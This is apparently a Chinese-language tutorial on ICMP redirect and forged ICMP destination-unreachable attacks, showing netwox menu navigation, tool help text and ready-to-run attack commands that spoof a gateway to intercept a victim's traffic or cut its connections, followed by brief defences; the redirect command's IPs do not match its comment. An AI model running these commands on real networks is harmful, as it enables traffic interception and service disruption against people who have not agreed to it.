ICMP重定向攻击
攻击原理
利用网关的身份,向被攻击主机发送ICMP重定向数据包,告诉它“你去下一个目标的下一跳是我”,于是被攻击主机在访问目标的时候其流量会重定向到攻击方,由此攻击方则可以进行数据的截获。
注意:
攻击者一定要有网关的身份(将源IP地址设置为网关的地址,添加新的网关为攻击者的IP地址),因为被攻击主机只会听网关的话。
攻击过程
A要去访问B,本来A的下一跳是网关R2,但是现在攻击者C向A发送一个ICMP重定向数据包,包中的信息为“源IP地址为网关R1IP地址(冒充网关R1的身份),伪造的网关地址为攻击者的IP地址”,A收到该数据包,发现这是我的boss(网关R1)给我发的报文,我必须要听它的,于是则会将自己的网关改为攻击者的IP地址,由此每当A要访问B时流量则会经过C,而C则可以对数据进行截获。
ICMP重定向的netwox工具为86
kali@kali:~$ netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): e
########################### ICMP ###########################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + ICMP spoof
b + ICMP server
c + network audit using ICMP
Select a node (key in 0123456abc): c
################# network audit using ICMP #################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 73:Simulate presence of a/several computer/s (arp and ping)
b - 81:Send an ICMP4 timestamp
c - 82:Sniff and send ICMP4/ICMP6 destination unreachable
d - 83:Sniff and send ICMP4/ICMP6 time exceeded
e - 84:Sniff and send ICMP4/ICMP6 parameter problem
f - 85:Sniff and send ICMP4 source quench
g - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): g
################# help for tool number 86 ##################
Title: Sniff and send ICMP4/ICMP6 redirect
+------------------------------------------------------------------------+
| This tool sends an ICMP error message when a packet matching filter |
| is sniffed. |
| Parameter --device indicates on which device to sniff. Please note |
| that under some systems, such as Windows, sniffing on some devices is |
| not supported. |
| Parameter --filter defines the sniff filter. It permits to restrict |
| captured packets. This kind of filter is named a BPF or pcap filter. |
| Basic elements of a filter are: |
| host 1.2.3.4 |
| net 192.168.10 |
| net 192.168.10.0 mask 255.255.255.0 |
| net 192.168.10.0/24 |
| port 21 |
| dst host 1.2.3.4 |
| src port 2345 |
| ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working) |
| ether src aa:bb:cc:dd:ee:ff |
| ip |
| arp |
| rarp |
| tcp |
| icmp |
| udp |
| Here are filter examples: |
| "host 1.2.3.4" |
| "net 192.168 and icmp" |
| "host 1.2.3.4 or dst port 80" |
| "(udp or tcp) and not host 1.2.3.4" |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to sniff |
| and spoof. |
+------------------------------------------------------------------------+
Usage: netwox 86 [-d device] [-f filter] -g ip [-s spoofip] [-c uint32] [-i ip]
Parameters:
-d|--device device device name {Eth0}
-f|--filter filter pcap filter
-g|--gw ip new gateway {192.168.248.129}
-s|--spoofip spoofip IP spoof initialization type {linkbraw}
-c|--code uint32 ICMP code {0}
-i|--src-ip ip source IP address {192.168.248.129}
Example: netwox 86 -g "192.168.248.129"
Example: netwox 86 --gw "192.168.248.129"
Press 'r' or 'k' to run this tool, or any other key to continue
攻击代码
netwox 86 -f "host 192.168.248.2 "–gw “192.168.249.129” -i "192.168.249.254"
//给目标地址192.168.248.2一个新的网关地址192.168.248.129,以目前网关的名义发出。
-f : 写要攻击的目标主机IP地址
–gw :写要添加的伪造的网关,即攻击者的IP地址
-i :写真正的网关地址
防御措施
禁止网关发出重定向消息,主机不处理重定向消息。
ICMP不可达攻击
攻击原理
攻击者伪造一个ICMP不可达的报文发送给被攻击主机,包含的信息有被攻击主机所要访问的服务器IP地址、目标端口、被攻击主机的IP地址等。
ICMP不可达报文netwox工具为82号
root@kali:/home/kali# netwox
Netwox toolbox version 5.39.0. Netwib library version 5.39.0.
######################## MAIN MENU #########################
0 - leave netwox
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + information
b + network protocol
c + application protocol
d + sniff (capture network packets)
e + spoof (create and send packets)
f + record (file containing captured packets)
g + client
h + server
i + ping (check if a computer if reachable)
j + traceroute (obtain list of gateways)
k + scan (computer and port discovery)
l + network audit
m + brute force (check if passwords are weak)
n + remote administration
o + tools not related to network
Select a node (key in 03456abcdefghijklmno): b
##################### network protocol #####################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + Ethernet
b + IP
c + UDP
d + TCP
e + ICMP
f + ARP
Select a node (key in 0123456abcdef): e
########################### ICMP ###########################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a + ICMP spoof
b + ICMP server
c + network audit using ICMP
Select a node (key in 0123456abc): c
################# network audit using ICMP #################
0 - leave netwox
1 - go to main menu
2 - go to previous menu
3 - search tools
4 - display help of one tool
5 - run a tool selecting parameters on command line
6 - run a tool selecting parameters from keyboard
a - 73:Simulate presence of a/several computer/s (arp and ping)
b - 81:Send an ICMP4 timestamp
c - 82:Sniff and send ICMP4/ICMP6 destination unreachable
d - 83:Sniff and send ICMP4/ICMP6 time exceeded
e - 84:Sniff and send ICMP4/ICMP6 parameter problem
f - 85:Sniff and send ICMP4 source quench
g - 86:Sniff and send ICMP4/ICMP6 redirect
Select a node (key in 0123456abcdefg): c
################# help for tool number 82 ##################
Title: Sniff and send ICMP4/ICMP6 destination unreachable
+------------------------------------------------------------------------+
| This tool sends an ICMP error message when a packet matching filter |
| is sniffed. |
| Parameter --device indicates on which device to sniff. Please note |
| that under some systems, such as Windows, sniffing on some devices is |
| not supported. |
| Parameter --filter defines the sniff filter. It permits to restrict |
| captured packets. This kind of filter is named a BPF or pcap filter. |
| Basic elements of a filter are: |
| host 1.2.3.4 |
| net 192.168.10 |
| net 192.168.10.0 mask 255.255.255.0 |
| net 192.168.10.0/24 |
| port 21 |
| dst host 1.2.3.4 |
| src port 2345 |
| ether host a:b:c:d:e:f ('ether a:b:c:d:e:f' is not working) |
| ether src aa:bb:cc:dd:ee:ff |
| ip |
| arp |
| rarp |
| tcp |
| icmp |
| udp |
| Here are filter examples: |
| "host 1.2.3.4" |
| "net 192.168 and icmp" |
| "host 1.2.3.4 or dst port 80" |
| "(udp or tcp) and not host 1.2.3.4" |
| Parameter --spoofip indicates how to generate link layer for spoofing. |
| Values 'best', 'link' or 'raw' are common choices for --spoofip. Here |
| is the list of accepted values: |
| - 'raw' means to spoof at IP4/IP6 level (it uses system IP stack). If |
| a firewall is installed, or on some systems, this might not work. |
| - 'linkf' means to spoof at link level (currently, only Ethernet is |
| supported). The 'f' means to Fill source Ethernet address. |
| However, if source IP address is spoofed, it might be impossible |
| to Fill it. So, linkf will not work: use linkb or linkfb instead. |
| - 'linkb' means to spoof at link level. The 'b' means to left a Blank |
| source Ethernet address (0:0:0:0:0:0, do not try to Fill it). |
| - 'linkfb' means to spoof at link level. The 'f' means to try to Fill |
| source Ethernet address, but if it is not possible, it is left |
| Blank. |
| - 'rawlinkf' means to try 'raw', then try 'linkf' |
| - 'rawlinkb' means to try 'raw', then try 'linkb' |
| - 'rawlinkfb' means to try 'raw', then try 'linkfb' |
| - 'linkfraw' means to try 'linkf', then try 'raw' |
| - 'linkbraw' means to try 'linkb', then try 'raw' |
| - 'linkfbraw' means to try 'linkfb', then try 'raw' |
| - 'link' is an alias for 'linkfb' |
| - 'rawlink' is an alias for 'rawlinkfb' |
| - 'linkraw' is an alias for 'linkfbraw' |
| - 'best' is an alias for 'linkraw'. It should work in all cases. |
| |
| This tool may need to be run with admin privilege in order to sniff |
| and spoof. |
+------------------------------------------------------------------------+
Usage: netwox 82 [-d device] [-f filter] [-c uint32] [-i ip] [-s spoofip]
Parameters:
-d|--device device device name {Eth0}
-f|--filter filter pcap filter
-c|--code uint32 ICMP code {0}
-i|--src-ip ip source IP address {192.168.248.129}
-s|--spoofip spoofip IP spoof initialization type {linkbraw}
Example: netwox 82
Press 'r' or 'k' to run this tool, or any other key to continue
攻击代码
netwox 82 -f “host 100.1.1.1 and port 80” -i "192.168.248.2"
//伪造一个ICMP不可达给被攻击主机
-f :服务器的IP地址,可以加上端口号
-i :被攻击者的IP地址
防御措施
增加服务断开的判断机制,做多重判断,不能仅从ICMP不可达来判断失去连接从而断开服务。
这个只能依靠linux内核的升级、开发者、操作系统、应用程序来修补该漏洞。